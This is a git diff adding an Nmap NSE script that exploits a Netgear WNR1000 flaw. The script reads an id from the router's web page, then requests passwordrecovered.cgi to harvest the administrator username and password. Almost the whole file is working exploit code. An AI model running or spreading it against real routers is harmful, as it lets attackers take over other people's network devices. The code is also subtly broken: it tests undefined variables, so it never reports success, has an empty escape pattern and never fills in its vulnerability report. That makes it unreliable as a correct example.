diff --git a/scripts/http-vuln-wnr1000-creds.nse b/scripts/http-vuln-wnr1000-creds.nse new file mode 100644 index 000000000..128ee8401 --- /dev/null +++ b/scripts/http-vuln-wnr1000-creds.nse @@ -0,0 +1,91 @@ +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local vulns = require "vulns" + +description = [[ +A vulnerability has been discovered in WNR 1000 series that allows an attacker +to retrieve administrator credentials with the router interface. +Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA + +Vulnerability discovered by c1ph04. +]] + +--- +-- @usage +-- nmap -sV --script http-vuln-wnr1000-creds -p80 +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-vuln-wnr1000-creds: +-- | VULNERABLE: +-- | Netgear WNR1000v3 Credential Harvesting Exploit +-- | State: VULNERABLE (Exploitable) +-- | IDs: None, 0-day +-- | Description: +-- | A vulnerability has been discovered in WNR 1000 series that allows an attacker +-- | to retrieve administrator credentials with the router interface. +-- | Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA +-- | Disclosure date: 26-01-2014 +-- | References: +-- |_ http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip +-- +--- + +author = "Paul AMAR , Rob Nicholls" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +portrule = shortport.http + +-- function to escape specific characters +local escape = function(str) return string.gsub(str, "", "") end + +action = function(host, port) + local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" + + local vuln = { + title = 'Netgear WNR1000v3 Credential Harvesting Exploit', + state = vulns.STATE.NOT_VULN, -- default + description = [[ + A vulnerability has been discovered in WNR 1000 series that allows an attacker + to retrieve administrator credentials with the router interface. + Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA. + Vulnerability discovered by c1ph04. + ]], + references = { + 'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html', + }, + dates = { + disclosure = {year = '2014', month = '01', day = '26'}, + }, + } + + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + local detection_session = http.get(host, port, uri) + + if detection_session then + -- gather the id + local id_netgear = string.match(escape(detection_session.body), ('(id=%d+)')) + + if id_netgear == nil then + stdnse.print_debug(1, "%s: Unable to obtain the id", SCRIPT_NAME) + return + else + -- send the payload to get username and password + local payload_session = http.post(host, port, uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "") + if payload_session then + local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username.+align="left">(.+).+Router Admin') + local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password.+align="left">(.+).+MNUText') + if (username ~= nil and password ~= nil) then + stdnse.print_debug(1, "%s: username : " .. escape(netgear_username), SCRIPT_NAME) + stdnse.print_debug(1, "%s: password : " .. escape(netgear_password), SCRIPT_NAME) + else + stdnse.print_debug(1, "%s: We haven't been able to get username/password", SCRIPT_NAME) + end + end + end + end +end \ No newline at end of file